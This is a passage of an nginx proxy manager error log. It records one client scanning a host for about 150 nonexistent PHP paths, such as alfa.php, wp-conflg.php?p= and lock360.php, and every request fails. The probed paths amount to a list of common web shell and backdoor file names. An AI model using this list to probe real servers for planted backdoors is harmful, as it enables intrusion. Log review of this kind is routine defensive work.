/wp-admin/css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:21 [error] 265#265: *15407 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:21 [error] 265#265: *15407 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:21 [error] 265#265: *15407 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /admin.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:21 [error] 265#265: *15407 open() "/var/www/html/randkeyword.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /randkeyword.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:21 [error] 265#265: *15407 open() "/var/www/html/fwe.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /fwe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/images/m.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /images/m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/g.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /g.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/tx1.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /tx1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/xv.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /xv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/x56.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /x56.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/htaccess.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /htaccess.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:22 [error] 265#265: *15407 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /readme.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:23 [error] 265#265: *15407 open() "/var/www/html/x50.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /x50.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:23 [error] 265#265: *15407 open() "/var/www/html/fv.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /fv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:23 [error] 265#265: *15407 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /file.php? HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:23 [error] 265#265: *15407 open() "/var/www/html/lsd.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /lsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:23 [error] 265#265: *15407 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/atx.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /atx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:24 [error] 265#265: *15407 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/wp-admin/network/wp-conflg.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/click.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /click.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:25 [error] 265#265: *15407 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/wp-includes/images/wp-login.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /w.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:26 [error] 265#265: *15407 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:27 [error] 265#265: *15407 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:27 [error] 265#265: *15407 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:27 [error] 265#265: *15407 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:27 [error] 265#265: *15407 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:27 [error] 265#265: *15407 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/wp-admin/maint/maint.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/maint.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /autoload_classmap.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:28 [error] 265#265: *15407 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /themes/twentytwentytwo/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/wp-admin/wp-conflg.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/wp-admin/css/wp-conflg.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:29 [error] 265#265: *15407 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /manager.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/plugins/Cache/footer.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /plugins/Cache/footer.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/mail.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /mail.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:30 [error] 265#265: *15407 open() "/var/www/html/sx.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /sx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/wp-admin/maint/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/byp.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /byp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/wp-trackback.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-trackback.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:31 [error] 265#265: *15407 open() "/var/www/html/.well-known/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /.well-known/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/wp-admin/network/plugins.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/plugins.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/css/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/wp-includes/SimplePie/wp-login.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:32 [error] 265#265: *15407 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/filemanager/dialog.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /filemanager/dialog.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/wp-includes/customize/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/customize/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/uploads/autoload_classmap.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /uploads/autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:33 [error] 265#265: *15407 open() "/var/www/html/wp-includes/style-engine/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style-engine/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:34 [error] 265#265: *15407 open() "/var/www/html/ww1.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ww1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:34 [error] 265#265: *15407 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /about/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:34 [error] 265#265: *15407 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:34 [error] 265#265: *15407 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:34 [error] 265#265: *15407 open() "/var/www/html/css/colors/blue/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/security.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /security.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/wp-content/upgrade/about.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/upgrade/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:35 [error] 265#265: *15407 open() "/var/www/html/wp-content/radio.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/wp-content/plugins/admin.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/wp-content/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/.well-known/log.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /.well-known/log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:36 [error] 265#265: *15407 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/bless5.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /bless5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/wp-includes/js/codemirror/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/codemirror/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/wp-includes/block-patterns/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:37 [error] 265#265: *15407 open() "/var/www/html/ioxi-o1.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/juuuu.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /juuuu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/we2.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /we2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/04.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /04.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:38 [error] 265#265: *15407 open() "/var/www/html/333.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /333.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/520.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /520.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:39 [error] 265#265: *15407 open() "/var/www/html/2clas.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /2clas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:40 [error] 265#265: *15407 open() "/var/www/html/ave.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /ave.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:40 [error] 265#265: *15407 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:40 [error] 265#265: *15407 open() "/var/www/html/bibil.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /bibil.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:41 [error] 265#265: *15407 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:41 [error] 265#265: *15407 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:41 [error] 265#265: *15407 open() 